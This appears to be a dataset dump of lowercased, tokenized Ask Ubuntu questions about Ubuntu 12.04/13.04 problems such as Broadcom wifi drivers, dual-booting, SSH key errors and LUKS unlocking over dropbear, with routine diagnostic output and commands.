337642	turning monitor off with an icon	i 'm running ubuntu 12.04 on my laptop and sometimes want to turn the display off immediately ( without closing the lid and without waiting for it to turn off by itself ) . i 'd prefer not to have to run a command to do this , so i created the `` ~/documents/monitor-off.sh '' script ( making it executable ) : # ! /bin/bash sleep 2 xset dpms force off i then created the `` ~/.local/share/applications/monitor-off.desktop '' file ( also making it executable ) : [ desktop entry ] name=monitor off exec=/home/nrogers64/documents/monitor-off.sh icon=monitor terminal=true type=application startupnotify=true i 'm not very familiar with ubuntu and am wondering if this was the correct way to go about solving this problem or if this solution is overkill . thanks !
337643	problem with ubuntu 12.04 and ideapad n581 ( broadcom )	i 've installed ubuntu 12.04 on a lenovo ideapad n581 and ca n't get the wifi to work reliably . i know it 's a problem with the broadcom drivers , but i still ca n't really work it out , i 've tried a few things mentioned on other forums but none of them have worked yet ( quite new to linux ) . strangely enough , if i remove the battery for a few minutes , wifi works fine until the computer is shut down . here are the results of sudo iwconfig : eth1 ieee 802.11abg essid : '' pingu '' mode : managed frequency:2.462 ghz access point : f8:1a:67 : cb:10:8e bit rate=72 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=70/70 signal level=-36 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth2 no wireless extensions . lo no wireless extensions . sudo lsmod : module size used by snd_hda_codec_hdmi 32476 1 snd_hda_codec_conexant 62363 1 joydev 17694 0 rfcomm 47562 12 parport_pc 32867 0 bnep 18240 2 ppdev 17114 0 coretemp 13642 0 ghash_clmulni_intel 13221 0 cryptd 20531 1 ghash_clmulni_intel rts5139 350620 0 lib80211_crypt_tkip 17391 0 uvcvideo 78117 0 videobuf2_core 33025 1 uvcvideo btusb 22432 0 wl 3074942 0 microcode 23030 0 bluetooth 211860 24 rfcomm , bnep , btusb videodev 125126 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc snd_hda_intel 34063 3 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel alx 73500 0 snd_hwdep 17765 1 snd_hda_codec mdio 13808 1 alx snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq snd 83674 16 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 102541 0 serio_raw 13216 0 cfg80211 208382 1 wl lpc_ich 17145 0 lib80211 14382 2 lib80211_crypt_tkip , wl i915 535221 3 mei 41410 0 soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm drm_kms_helper 49259 1 i915 drm 290595 4 i915 , drm_kms_helper i2c_algo_bit 13565 1 i915 ideapad_laptop 18235 0 sparse_keymap 13891 1 ideapad_laptop video 19653 1 i915 mac_hid 13254 0 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp ahci 25869 2 libahci 27338 1 ahci and lspci -nnk | grep -ia2 net 01:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) subsystem : lenovo device [ 17aa:3979 ] kernel driver in use : alx -- 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ] kernel driver in use : wl update i removed and purged the wl drivers with sudo apt-get remove -- purge bcmwl-kernel-source , shut the laptop down and removed the battery . on boot , no wireless drivers are loaded . the brcmsmac driver can be loaded with sudo modprobe brcmsmac . the country code is loaded with sudo iw reg set de . lspci -nnk | grep -ia2 net returns : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ] kernel driver in use : bcma-pci-bridge right now , no networks are detected , but after these operations i was able to connect to a network ( with a weak signal ) . after a few minutes , the connection dropped and could not connect again . 13.04 i booted from a live usb with 13.04 . networks are detected ( but weak ) , lspci returns : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ] kernel driver in use : bcma-pci-bridge scan returns : wlan0 scan completed : cell 01 - address : f8:1a:67 : cb:10:8e channel:1 frequency:2.412 ghz ( channel 1 ) quality=45/70 signal level=-65 dbm encryption key : off essid : '' pingu '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000f50a54 extra : last beacon : 88ms ago ie : unknown : 000550696e6775 ie : unknown : 010882848b960c121824 ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : 2d1aef1103ffff0000000000000000000000000000000406e6e70d00 ie : unknown : 331aef1103ffff0000000000000000000000000000000406e6e70d00 ie : unknown : 3d16010d0000000000000000000000000000000000000000 ie : unknown : 3416010d0000000000000000000000000000000000000000 ie : unknown : dd180050f2020101870003a4000027a4000042435e0062322f00 ie : unknown : dd0900037f01010000ff7f ie : unknown : dd9e0050f204104a00011010440001011057000101103b0001031047001000000000000010000000f81a67cb108e1021000754502d4c494e4b10230009544c2d57523834314e10240003382e3010420003312e301054000800060050f204000110110019576972656c65737320526f7574657220544c2d57523834314e100800020086103c000101104900140024e26002000101600000020001600100020001 however , i ca n't connect to the network , with or without wpa2 . i then install linux-firmware-nonfree , remove the drivers brcmsmac and bcma , reload brcmsmac . the wireless device is now wlan1 instead of wlan0 , it successfully scans but can not connect ( or when it does , it immediately drops ) . wifi signals are still very weak . iwconfig during the 5 seconds or so that it successfully connects returns : wlan2 ieee 802.11bgn essid : '' pingu '' mode : managed frequency:2.412 ghz access point : f8:1a:67 : cb:10:8e bit rate=1 mb/s tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=42/70 signal level=-68 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:4 invalid misc:0 missed beacon:0 this goes for both wpa2 and unsecured networks . 12.04 live when booting on 12.04 from a live usb , wifi works when the proprietary sla wl driver is loaded . lspci returns : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ] kernel driver in use : wl kernel modules : wl , bcma should i reinstall 12.04 ? backports 3.11 after installing the backports 3.11 according to can not connect to wifi with ubuntu 13.04 , the signal is still extremely low , i can not connect to any network since i ca n't reliably detect any . iwconfig : wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lspci -nnk : kernel driver in use : bcma-pci-bridge kernel modules : bcma sudo modprobe wl : fatal : module wl not found . fatal : error running install command for wl after installing bcmwl-kernel-source_5.100.82 , i can detect networks but can not join : iwconfig : wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lspci-nnk kernel driver in use : bcma-pci-bridge kernel modules : bcma sudo modprobe wl : fatal : module wl not found . fatal : error running install command for wl
337649	how to install the sims 3 ... starter pack ?	i 've just bought the same 3 starter pack but i do n't know how to install it and i want to play the same from my heart . somebody knows how ?
337651	how to install unity lenses manually ?	so yesterday i installed ubuntu 12.04 and i wanted to know how to install some lenses manually ! thank you for your time !
337654	fade in or out a qml audio file ?	i have a qml audio element in my app that plays a sound . when i click a button i execute : audio.play ( ) and when i click it again i execute : audio.stop ( ) ideally i would like to fade the sound in a little when the user clicks the button to play the sound , and fade it out a little when they press the button to stop the sound . how do i do this ?
337661	should i accept ubuntu updates if i 'm running 10.04 netbook remix or move to lubuntu ?	i am a novice linux/ubuntu user . i finally gave up on my hp mini mie and took a shot at loading ubuntu before throwing it away . well , i found a copy of 10.04 ( netbook remix ) , downloaded it and actually love it compared to what i had before . however , i 'm getting recommended updates and i 've accepted some of them without any problem . i 'm concerned that eventually 10.04 might not work well with some of the updates . should i be happy with what i have and not accept updates or should i move on to something more current that will run on my atom processor ? i would like to continue using firefox , openoffice and reader but that 's about it . would lubuntu be a smart option ? thanks ,
337664	how do i fix the the brightness controls on a samsung rv520 ?	i 'm running ubuntu 13.04 on my samsung rv520 with nvidia gt520m but it looks like my screen 's brightness is set to a value close the minimum ! even though i can see the brightness bar increase or decrease by pressing fn up or fn down , or by trying to manually adjust it , it never really changes ...
337668	installation of older kernel - as further option - no problem ?	have not thought deeper in earlier sitin in terminal one year ago - and there i have removed kernel 3.2.x now some newer kernels have been installed like 3.5.x , 3.8.x , and 3.10.0-rc4 i want to know , if i can reinstall e.g . actual kernel-version of 3.2.26 ( is ubuntu-version as 3.2.50 available ? ) . i do n't want downgrade , simply build-in 3.2.x as further option besides the newer ones . is this no problem ? - i would not risk an inconsistent system then ? ( yes - i should know this myself - but got slammed up by search results ... ) here is 12.10
337669	z87-gd65 gaming motherboard killer ethernet not working	i just built my new computer today , install ubuntu 13.04 on it , took a bit of hacking to get it working and such but now that it boots , i can not get the ethernet to work . it simply do not sees it though if i do lspci it shows up . http : //www.msi.com/product/mb/z87-gd65-gaming.html # overview lspci : 03:00.0 ethernet controller : qualcomm atheros killer e2200 gigabit ethernet controller ( rev 13 ) lspci -nn : 03:00.0 ethernet controller [ 0200 ] : qualcomm atheros killer e2200 gigabit ethernet controller [ 1969 : e091 ] ( rev 13 ) i have done http : //askubuntu.com/a/335405/187586 and it shows the connection as 'connecting ' but never actually saying connected .
337672	ubuntu 13.04 alongside windows 8 issues	i have a toshiba c55 , trying to install ubuntu 13.04 alongside windows 8 . when i get to the point where i install ( partition , run along side ... ) it only gives me the option to wipe out the drive and do a fresh install . it says that it does n't recognize any existing os install . in the bios i only have the option to disable the secure boot option . i do n't have the option to disable fastboot . any ideas ?
337675	how can i pin the toolbar so that it remains revealed ?	an always-revealed toolbar would be more suitable for a pointer-driven interface . how , using the ubuntu sdk , can i set the toolbar to be ( and remain ) revealed ?
337678	plugin ubuntu desktop	i 'm want to do a plugin to ubuntu in my term paper , but i never had seen something like this to ubuntu . i want to know about the complexity to `` extend '' an os , how much time will spend to do something like this ? what languages could i use ? what kind of biography i must to read ? sorry if i have n't followed some asking pattern , but i 'm hurry about this . thanks in advance .
337680	unable to open any applications or shut down	i 'm using ubuntu 12.04 lts . recently , i 've been having a problem where everything will be functioning normally , and then i get the same string of problems : 1 . ) i ca n't open any new applications , or at least not by clicking on one in my sidebar . 2 . ) i can go to the dropdown where i can select 'shut down ' but i click on it and nothing happens . 3 . ) sometimes before everything stops functioning normally , i will go to shut down and it will stall in the full screen terminal like thing which it usually passes through when shutting down . 4 . ) in both cases 2 and 3 , i am forced to resort to just powering off by holding down power button .
337681	unable to boot after depleting the battery	i have ubuntu 12.04 installed on my dell xps 13 ultrabook . i left the laptop on for a couple of days so the battery ran out . after that i am getting a black screen when i try to boot up the laptop . this happens even before i can see the dell logo .
337682	how can i anchor a component to the top of the toolbar ?	using the ubuntu sdk , how can i get an anchor to the top of the toolbar ? i want something like this : myitem { anchors.bottom : toolbar.top } so that i can anchor an item to an omnipresent toolbar in a way that is suitable for a pointer-driven interface .
337688	how does the ubuntu sdk handle accessibility ?	how do i design an application in the ubuntu sdk so that it integrates with assistive technology such as screen readers ?
337689	how do i get proprietary broadcom drivers to work after installation ?	this is my first installation of ubuntu , but i 've been running it live on a dvd and flash drive for months . today i installed ubuntu 13.04 onto a 3-year old lenovo g550 laptop , and it has a proprietary broadcom wireless driver . when i booted ubuntu as a live system from the dvd , telling ubuntu to use the proprietary driver in the settings menu was straightforward , and i was able to connect to my home wifi . however , after installation , i attempted to do the same process , but after i hit `` apply changes '' after selecting `` use broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( propretary ) '' , i was met by a pop-up telling me to authenticate . i entered my password , and hit enter . the window dims , a bar indicates that the change is working , but then it changes again to `` do not use driver . '' for some reason , the driver just wo n't install . it worked when i was running ubuntu live , but after installation it wo n't work . what do i do ? my laptop is compromised if i ca n't use the wireless ( because windows 7 crashed on the computer ) . any help would be greatly appreciated .
337693	how to format a 4k sector hard drive ?	i bought a seagate st3000dm001 3tb hard drive . it was sold inside an enclosure . i formatted to ext4 , copied some data to it and then i removed it from the enclosure and connected it directly to the motherboard . my data was n't visible to os ( it was seeing one unknown ~300gib partition and the rest as free space ) so i started reading about advanced format and > 2tb drives . i connected the disk with usb again , copied all the data , and plugged to sata once again . i used gparted to create a gpt partition table ( the ubuntu disk utility would n't let me with error synchronizing after initial wipe : timed out waiting for object ( udisks-error-quark , 0 ) , created one big 3tb ext4 partition , left the default align to value to mib and formatted . the drive is recognized correctly , and mounts properly . files can be copied from and to the drive successfully . however : gparted shows the disk having 512k sectors which i know is not true1 while cat /sys/block/sdb/queue/physical_block_size reports 4096 i have found some reports that libparted has a problem with non-512k sectors2 and others3 that say that aligning to mib is enough . parted reports that the drive is aligned when i choose minimal : ( parted ) align-check alignment type ( min/opt ) [ optimal ] /minimal ? min partition number ? 1 1 aligned ( parted ) is my configuration correct ? do i have performance penalty because the disk is formatted with 512k sectors , is gparted reporting false values or i have understood the whole thing wrong ? http : //www.storagereview.com/seagate_barracuda_3tb_review_1tb_platters_st3000dm001 http : //ubuntuforums.org/showthread.php ? t=1536933 & p=9754234 # post9754234 http : //wdc.custhelp.com/app/answers/detail/a_id/5655
337698	how to edit plymouth in a ubuntu version agnostic manner ?	how can i edit plymouth with my own theme ( images and animations ) ?
337701	split partition with ubuntu 13.04 and windows 7	how do i split the partition without loosing my windows os and files .i am mainly concerned about the new table .
337703	black screen when selecting `` try ubuntu '' 13.04 on windows 8	i have been trying to install ubuntu 13.04 dual-booted with windows 8 on my computer ( hp envy 15 notebook pc ) . my motherboard is uefi supported . following most guides , i created a liveusb to boot from , i disabled secureboot and disabled faststarup . my computer does n't seem to have intel smart response technology or a fast/quickboot option . i boot the liveusb ( uefi ) and am able to get to the grub 2.0 menu ; however , when i select `` try ubuntu '' i get a black screen and when i select `` install ubuntu '' it boots me straight into windows 8 . moments ago i tried booting in legacy mode and still ended up with a black screen . when i select nomodeset i get another black screen this time with a blinking underscore at the top left ; when i tried acpi = off i received the message `` an error occurred when trying to mount /tmp '' and when i try nolapic i get a black screen ( not sure if i am supposed to try nolapic and acpi = off at the same time ) . if anyone has any information on how to solve this issue i would greatly appreciate ! please keep in mind this is my first time using ubuntu or any linux distro for that matter . regards , chad
337706	dpkg keep saying that need to -- configure -a while trying for network issues on inspiron 1545	i 've just installed ubuntu for the first time on a computer ( version 12.10 ) . i ca n't figure out how to get a wired connection to work or a wireless connection . i 've read similar problems , and i 've tried the other recommended fixes ( at least those that i could figure out ) , and none of them have worked . most of the time the terminal just gives me an error when i try to type in the message others recommend . i see a lot of people recommending to type this in : sudo apt-get remove bcmwl-kernel-source this gives me an error message that says : e : dpkg wasa interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so , outside of recommending that fix , what are some other options ? i 'm using another computer to ask this question . also , i 'm running from a flash driver right now . is that a problem ? should i try to install an older version . i 'd like to install on my computer , but i ca n't without an internet connection ... thanks !
337708	asus q400a wireless drivers	so i have ubuntu 12.04 on my asus q400a it all looks fine but the wireless drivers are missing i have tried installing the intel drivers from the repository but nothing . suggestions or solutions will be greatly appreciated thank you .
337712	how to map < right alt > to < left alt > + < f1 > ?	putting the following into a .xbindkeysrc makes my keyboard irresponsive after reboot , with only control keys responding : '' { echo keystrpress alt_l ; echo keystr f1 ; echo keystrrelease alt_l ; } | xmacroplay :0 '' release+f13 i know the xmacroplay works because i 've executed it at the command line , and also , executing xbindkeys to map , for example , f2 , without rebooting , works as expected . so , first , i have a problem after rebooting , because of that i had to remove the .xbindkeysrc file . i was in the hard process of trying to create the simple mapping of right alt to left alt + f1 in the system . i was going to use xbindkeys to map f13 to alt + f1 and xmodmap to map right alt to f13 ... how do i map right alt to left alt + f1 so that i get hide/unhiding of the launcher with a single key ?
337715	i still can not fix my wifi	wifi does not work at all . i 've tried this : http : //lkubuntu.wordpress.com/2011/09/08/how-to-fix-broadcom-43xx/ and also upgrading my kernels . i 've also tried removing the drivers and updating them . however , i keep running into errors . i have the broadcom bcm43227 802.11b/g/ when i checked what my laptop recognized : ifconfig ; it showed only eth0 which is my wired network , and `` lo '' but it does n't show the wlan which is the wifi network . so , i do n't know what is happening with my wifi . none of the software detect it . i 'm a newbie , so detailed instructions would be awesome . ubuntu 12.04.3 -- - fixed -- - refer to : broadcom sta driver fails to install missing wl on ubuntu 12.04.3 lts / linux 3.8 the issue you are dealing with seems to mainly appear on ubuntu 12.04.3 lts with the backported kernel 3.8.0-xx installed . please take a look at this bug report . as you can see it 's a known problem and many different workarounds exist . what worked for me was installing the latest bcmwl-kernel-source from raring . you can find this package here . make sure to download the right one for your system , e.g . this one if you have an amd64 machine . you can install the package via : sudo dpkg -i ~/downloads/bcmwl-kernel-source_6.20.155.1+bdcom-0ubuntu6_amd64.deb of course you will have to change the path to the deb file in accordance to where you downloaded it to . you might have to execute the following command afterwards to get your wireless up and running : sudo modprobe wl
337717	massive disk i/o on memory reach % 70	previously system became unresponsive when ram usage reached around % 70 . it was because of massive disk i/o operation , presumably to swap disk . i tried to tweak swapiness factor and it did n't affect anything at all on both sides of the extreme . i decided to delete the swap partition altogether , since my system has 4gb ram . the swap partition was about 6gb . it is yet no difference . it seems in whatsoever configuration , % 30 of memory should always be free . this is not a space rocket command and control system , so i do n't understand this cautious policy . can anyone please explain ? is there any other setting i could tweak to get the bar of memory usage up to say % 95 ? thanks
337720	why i can access internet with my browser , but ubuntu one and the software center ca n't ?	i have dlink dwm-156 usb modem its working internet browsing , but its not working ubuntu one and software center . how it is possible ?
337721	hauppauge wintv does not work on ubuntu 12.04	i can not get my wintv card to work with ubuntu 12.04 . the same card has worked in previous versions of ubuntu , and i know the card is working because the pc has dual booting and it works fine in windows . the card is recognised and shows up as bt878 hauppauge /dev/video0 in applications , but i get garbage when try to use it . are you able to help out ?
337726	full system encryption with luks on headless server - unlock with dropbear and busybox . how ?	i encrypted a headless server with cryptsetup/luks . 2 hdds with 512 mb /boot on /dev/md0 and 1,61 tb luks encrypted /dev/md1 with lvm containing / , swap , and others . i installed dropbear ( and busybox was already installed ) to unlock everything during the boot process . i use grub2 . so far everything works fine . i can login with a private key on dropbear listening on port 22 and unlock luks with the command echo -n `` passphrase '' > /lib/cryptsetup/passfifo as soon as i do this , the server boots as if nothing is encrypted . which is exactly what i want . now , while this works fine , it 's not how i want it to work . first off all , i ca n't find any documentation on /lib/cryptsetup/passfifo . how does it even work ? second , i generated a keyfile with gpg ( also one with cryptsetup as a loop back device ) that i want to use instead of a password . but i ca n't find any documentary on how to do this in busybox . gpg does not seem to be installed , so i ca n't use that key ( can i somehow make gpg available to busybox ? ) so at the moment , the only way for me to unlock my system is to pass my password to /lib/cryptsetup/passfifo which i do n't want to use . i tried using cryptsetup directly in it 's busybox path like cryptsetup luksopen /dev/md1 cryptdisk i did not show any errors , but my system did not proceed with the boot . any ideas what i could do , or is there something wrong with my approach of handling this ? frank
337731	recovering root password in vmware for ubuntu 12.10	i have installed ubuntu 12.10 in vmware , and i am not able to understand why is it rejecting root password upon entering it on in the terminal . so i would like to have a new password instead . can someone guide me through the procedure of changing a root password on ubuntu 12.10 which is installed on vmware player . i have not forgotten the root password , as a matter of fact during the installing process it asked just for a single password i.e . my user password which i also do remember and no mention about the root password was done . so i am not able to understand has it considered the same as the root password or is there something else by default ?
337732	reinstall ubuntu ( with windows 7 )	i successfully messed up ubuntu . now , i need to reinstall it . but windows 7 is also installed on my computer , and it is the main os . now i booted up into the ubuntu 13.04 installation dvd , and one of the options is to `` reinstall ubuntu 13.04 '' . i need to reinstall ubuntu , but i do n't want to lose my windows 7 os from the reinstallation . i just wanted to make sure and be clear that it is okay to reinstall ubuntu* . thanks ! *that is : ubuntu will be reinstalled in the right partition from its previous installation , and my windows 7 os will take no harm .
337735	set logon hours for user accounts	i want to stop a user account from logging in after a specified time . i know how to do this on windows , but i ca n't seem to find an a way to do this on linux .
337738	ca n't install ubuntu because i do n't have enough free space	this is my first post and my first day using any linux-based operating system . two days ago i dropped my hp windows 8 laptop . i got the error : boot device not found . please install an operating system on your hard disk . hard disk ( 3f0 ) . i could n't access any files or the os , so i went on my sister 's computer , researched and learned about ubuntu . i saved ubuntu 12.04.3 lts to a disk and loaded it , but when i tried to install it , i had it connected to the power adaptor and the wifi , however there was not enough free space to install it . how do i view and delete files from the try ubuntu without installing mode ? tldr - is there a way to delete previous files if i ca n't dual boot , using the `` uninstalled version '' of ubuntu 12.04.3 ?
337739	how do i determine what is using the folder ?	i just ca n't delete the folder under root ( it says that resource/device is busy ) , but lsof and fuser tell me nothing . the folder is located in the depth of /var/www/ ... and i tried to delete it after i stop apache2 and nginx .
337743	after disconnecting from my office vpn , internet is not working	aug 26 , 2013.. i did my ubuntu12.04 upgrate using update manager ... after that , i 'm unable to connect to internet . but , with vpn i 'm able to connect.. what might causing the issue ?
337753	mouse wheel does n't scroll in emacs 23.4.1 in ubuntu 13.04	scrolling with the mouse wheel does n't work for me in emacs . when i try , i get the messages : mouse-4 [ [ or mouse-5 ] ] is undefined i tried m-x mouse-wheel-mode , but get the error : symbol 's value as variable is void : mouse-wheel-mode possibly useful information : i recently installed ubuntu 13.04 , dual-booted with windows 8 on my laptop . i installed emacs using apt-get install emacs , which pulled version 23.4.1 i 'm a fairly comfortable linux user , but i have very little system management experience so it 's entirely possible i 'm missing something obvious .
337754	i get 'package is of bad quality ' error while installing crossplatformui for mblaze	my system is 64-bit ubuntu 13.04 . i 'm trying to connect through usb 3.0 port . output of lsusb bus 003 device 005 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800/e173 ( hspa modem ) i want to access mts mblaze for internet . i was not able to create connection so i googled and found out that 'crossplatformui-v2.1.2-sstl-all-ubuntu.deb ' would solve the problem . i downloaded this package and tried to install but i 'm getting package is of bad quality error .
337756	is it possible to write protect a flash drive ?	i want to write protect and unprotect it to keep files from being formatted whenever people use it in a windows pc . i do n't want people to delete my school work and i bring this to school and use it with a live cd of lubuntu 12.04 in my moms laptop . people have got into my backpack while i went to the bathroom and plugged it into a pc ( the flash drive had ex4 file format ) and when it asked to format it they clicked yes assuming nothing will be deleted .
337757	how to fix permission denied ( public key ) error ?	while trying to communicate between my desktop ubuntu 12.10 and fedora 19 desktop , i am facing the error of permission denied ( public key ) . i am able to login through ssh from fedora to ubuntu , but not vice-versa . i even performed telnet on both machines via port 22 and both machines are listening , but not through ssh . what to do ? any idea ? my sshd_config file is as follows : # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords passwordauthentication yes # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options gssapiauthentication no gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes this is sshd_config of ubuntu system .
337760	device is not detected via mtp ( tcl idol x s950 phone )	i have just purchased a new tcl idol x s950 phone and i 'm figuring out some issue to make it visible on my system . this phone uses android 4.2.2 and i guess this is the cause of the issue : my previous phone with android 4.1 was correctly displayed in nautilus/dolphin ( using mtpfs ) . now i have tried to install mtp-tools , but nothing has changed . lsusb gives me that list ( t & a mobile phones should be my phone ) . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 1bbb:0168 t & a mobile phones bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 1bcf:2b80 sunplus innovation technology inc . bus 002 device 003 : id 8086:0189 intel corp. dmesg gives me this output : 15780.855333 ] usb 3-2 : new high-speed usb device number 2 using xhci_hcd [ 15780.874336 ] usb 3-2 : new usb device found , idvendor=1bbb , idproduct=0168 [ 15780.874348 ] usb 3-2 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 15780.874354 ] usb 3-2 : product : tcl s950 [ 15780.874359 ] usb 3-2 : manufacturer : tct [ 15780.874364 ] usb 3-2 : serialnumber : feskmrsoylw8rksk
337765	installing c compiler , jdk etc . in ubuntu	i am a new to ubuntu . i have used windows before , but i am not able to install new software in ubuntu from the offline setup files , so i do n't know how to install software in ubuntu . please tell me how to install new software , such as c compiler , jdk , etc . in ubuntu .
337769	install calibre 1.0 ebook library	how to install calibre 1.0 in ubuntu 13.04 ?
337775	how do i get a rt2800usb wireless device working ?	my brand new desktop running 13.04 has endless problems with wireless . dozens of others are flooding forums with reports of the same problems . it worked fine for a few days , then there were a few days where it started having problems sometimes and working sometimes . now it never works at all . i have 5+ devices all able to connect without any trouble at all , including iphone , android phone , 3ds , multiple game consoles , a laptop running windows 7 , and even a second desktop machine running ubuntu 12.04 sitting right behind the 13.04 machine . all other devices have full wireless bars displayed ( strong signals ) . at any moment , one of the following is happening , and it changes randomly : trying to connect forever , but never establishing a connection . wireless icon constantly animating . finds no wireless networks at all . ( there are 12+ in range according to other devices . ) will not try to connect to the network . if i use the icon to connect , it will display `` disconnected '' within a few seconds . will continuously ask for the network password . typing it in correctly does not help . wireless is working fine . this happens sometimes . it can work for days at a time , or only 10 mins at a time . various things that usually do nothing but sometimes fix the problem : reboot . this has the best chance of helping , but it usually takes 5+ times . disable/re-enable wi-fi using the wireless icon . disable/re-enable networking using the wireless icon . use the icon to try and connect to a network ( if found ) . use the icon to open edit connections and delete my connection info , causing it to be recreated ( once it 's actually found again ) . various things that seem to make no difference : changing between using linux headers in grub at bootup , between 3.10.0 , 3.9.0 , or 3.8.0 . move the wireless router very close to the desktop . running sudo rfkill unblock all ( i dunno what this is supposed to do . ) i 've used ubuntu for 6 years and i 've never had a problem with networking . now i 'm spending all my time reading through endless problem reports and trying all the answers . none of them have helped . i am doing this instead of getting work done , which is defeating the whole purpose of using ubuntu . it 's heartbreaking to be honest . in the current state of `` no networks are showing up '' , here are outputs from the random things that other people are usually asked to run : lspic 00:00.0 host bridge : intel corporation haswell dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation haswell pci express x16 controller ( rev 06 ) 00:14.0 usb controller : intel corporation lynx point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-v ( rev 04 ) 00:1a.0 usb controller : intel corporation lynx point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point pci express root port # 1 ( rev d4 ) 00:1c.2 pci bridge : intel corporation 82801 pci bridge ( rev d4 ) 00:1d.0 usb controller : intel corporation lynx point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 610 ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf119 hdmi audio controller ( rev a1 ) 03:00.0 pci bridge : asmedia technology inc. asm1083/1085 pcie to pci bridge ( rev 03 ) lsmod module size used by e100 41119 0 nls_iso8859_1 12713 1 parport_pc 28284 